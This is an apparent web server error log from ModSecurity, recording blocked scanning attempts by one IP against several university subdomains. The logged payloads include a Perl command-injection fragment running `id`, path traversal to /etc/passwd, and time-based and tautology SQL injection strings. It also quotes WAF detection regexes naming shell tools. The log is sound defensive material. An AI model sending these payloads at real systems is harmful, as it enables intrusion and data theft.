[Tue Aug 29 11:43:21.507229 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAXNua8AAAAg"]
[Tue Aug 29 11:43:21.507725 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdeQ3kAAAAQ"]
[Tue Aug 29 11:43:21.508476 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAe1eeQAAAAB"]
[Tue Aug 29 11:43:21.535217 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdeQ3oAAAAQ"]
[Tue Aug 29 11:43:22.463692 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13asCo-f0AAAXNubEAAAAg"]
[Tue Aug 29 11:43:22.649623 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAdECgQAAAAW"]
[Tue Aug 29 11:43:22.672708 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13asCo-f0AAAdECgUAAAAW"]
[Tue Aug 29 11:43:23.380592 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAc@cccAAAAL"]
[Tue Aug 29 11:43:23.382578 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAeAW8AAAAAu"]
[Tue Aug 29 11:43:23.429582 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13a8Co-f0AAAcvBn8AAAAJ"]
[Tue Aug 29 11:43:23.445424 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAexIBsAAAAN"]
[Tue Aug 29 11:43:23.491617 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAe1ee4AAAAB"]
[Tue Aug 29 11:43:25.389213 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13bcCo-f0AAAdftZAAAAAG"]
[Tue Aug 29 11:43:25.425418 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13bcCo-f0AAAd9UQUAAAAr"]
[Tue Aug 29 11:43:27.608966 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13b8Co-f0AAAdTBHcAAAAY"]
[Tue Aug 29 11:43:27.615315 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg74AAAAU"]
[Tue Aug 29 11:43:27.636559 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg78AAAAU"]
[Tue Aug 29 11:43:27.637495 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxoAAAAI"]
[Tue Aug 29 11:43:27.656238 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxsAAAAI"]
[Tue Aug 29 11:43:27.667106 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAdTBHoAAAAY"]
[Tue Aug 29 11:43:28.528206 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe3960AAAAA"]
[Tue Aug 29 11:43:28.553632 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAdTBH8AAAAY"]
[Tue Aug 29 11:43:28.626008 2023] [:error] [pid 1991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAfH1Q4AAAAZ"]
[Tue Aug 29 11:43:28.634538 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAcvBpoAAAAJ"]
